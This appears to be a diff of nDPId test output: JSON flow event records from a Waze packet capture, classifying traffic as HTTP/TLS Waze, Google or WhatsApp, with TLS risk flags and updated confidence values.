+00674{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1435587869162,"flow_last_seen":1435587869302,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":393,"flow_tot_l4_payload_len":535,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45536,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"}} +00674{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1435587871656,"flow_last_seen":1435587871946,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":393,"flow_tot_l4_payload_len":550,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45538,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"}} +00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1435587871658,"flow_last_seen":1435587871945,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":355,"flow_tot_l4_payload_len":510,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45540,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"}} +00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1435587871941,"flow_last_seen":1435587872478,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":393,"flow_tot_l4_payload_len":552,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45546,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"}} +00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1435587872476,"flow_last_seen":1435587872705,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":393,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45552,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"}} +00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1435587872702,"flow_last_seen":1435587872838,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":391,"flow_tot_l4_payload_len":543,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45554,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1435587898822,"flow_last_seen":1435587899372,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":191,"flow_tot_l4_payload_len":511,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"108.168.176.228","src_port":50828,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880579,"flow_last_seen":1435587880583,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.198","src_port":45169,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00570{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880579,"flow_last_seen":1435587880583,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.198","src_port":45169,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00913{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":107,"flow_first_seen":1435587868634,"flow_last_seen":1435587888318,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17204,"flow_tot_l4_payload_len":79914,"flow_avg_l4_payload_len":746,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36100,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} -00910{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1435587868635,"flow_last_seen":1435587884546,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3606,"flow_tot_l4_payload_len":9966,"flow_avg_l4_payload_len":269,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} -00911{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1435587894241,"flow_last_seen":1435587901093,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3147,"flow_tot_l4_payload_len":5269,"flow_avg_l4_payload_len":219,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36134,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} -00911{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1435587905035,"flow_last_seen":1435587907392,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2135,"flow_tot_l4_payload_len":4480,"flow_avg_l4_payload_len":194,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36137,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} -00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1435587878606,"flow_last_seen":1435587882306,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11132,"flow_tot_l4_payload_len":42871,"flow_avg_l4_payload_len":1339,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36312,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1435587879018,"flow_last_seen":1435587882336,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2479,"flow_tot_l4_payload_len":4573,"flow_avg_l4_payload_len":228,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36314,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} -00810{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1435587879850,"flow_last_seen":1435587883075,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":8096,"flow_tot_l4_payload_len":26354,"flow_avg_l4_payload_len":941,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36316,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} +00913{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":107,"flow_first_seen":1435587868634,"flow_last_seen":1435587888318,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17204,"flow_tot_l4_payload_len":79914,"flow_avg_l4_payload_len":746,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36100,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} +00910{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1435587868635,"flow_last_seen":1435587884546,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3606,"flow_tot_l4_payload_len":9966,"flow_avg_l4_payload_len":269,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} +00911{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1435587894241,"flow_last_seen":1435587901093,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3147,"flow_tot_l4_payload_len":5269,"flow_avg_l4_payload_len":219,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36134,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} +00911{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1435587905035,"flow_last_seen":1435587907392,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2135,"flow_tot_l4_payload_len":4480,"flow_avg_l4_payload_len":194,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36137,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} +00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1435587878606,"flow_last_seen":1435587882306,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11132,"flow_tot_l4_payload_len":42871,"flow_avg_l4_payload_len":1339,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36312,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1435587879018,"flow_last_seen":1435587882336,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2479,"flow_tot_l4_payload_len":4573,"flow_avg_l4_payload_len":228,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36314,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} +00810{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1435587879850,"flow_last_seen":1435587883075,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":8096,"flow_tot_l4_payload_len":26354,"flow_avg_l4_payload_len":941,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36316,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} 00628{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880587,"flow_last_seen":1435587880590,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.198","src_port":43089,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00571{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880587,"flow_last_seen":1435587880590,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.198","src_port":43089,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00808{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1435587871939,"flow_last_seen":1435587873226,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3994,"flow_tot_l4_payload_len":8301,"flow_avg_l4_payload_len":518,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39010,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1435587868996,"flow_last_seen":1435587869400,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":548,"flow_tot_l4_payload_len":1420,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.118.48","src_port":36585,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1435587878215,"flow_last_seen":1435587880857,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":21888,"flow_tot_l4_payload_len":57094,"flow_avg_l4_payload_len":1730,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39021,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1435587871918,"flow_last_seen":1435587874945,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":6561,"flow_avg_l4_payload_len":285,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51049,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1435587871929,"flow_last_seen":1435587874378,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2111,"flow_tot_l4_payload_len":4561,"flow_avg_l4_payload_len":253,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51050,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1435587871935,"flow_last_seen":1435587874495,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2111,"flow_tot_l4_payload_len":6561,"flow_avg_l4_payload_len":312,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51051,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} +00808{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1435587871939,"flow_last_seen":1435587873226,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3994,"flow_tot_l4_payload_len":8301,"flow_avg_l4_payload_len":518,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39010,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} +00810{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1435587868996,"flow_last_seen":1435587869400,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":548,"flow_tot_l4_payload_len":1420,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.118.48","src_port":36585,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1435587878215,"flow_last_seen":1435587880857,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":21888,"flow_tot_l4_payload_len":57094,"flow_avg_l4_payload_len":1730,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39021,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1435587871918,"flow_last_seen":1435587874945,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":6561,"flow_avg_l4_payload_len":285,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51049,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1435587871929,"flow_last_seen":1435587874378,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2111,"flow_tot_l4_payload_len":4561,"flow_avg_l4_payload_len":253,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51050,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} 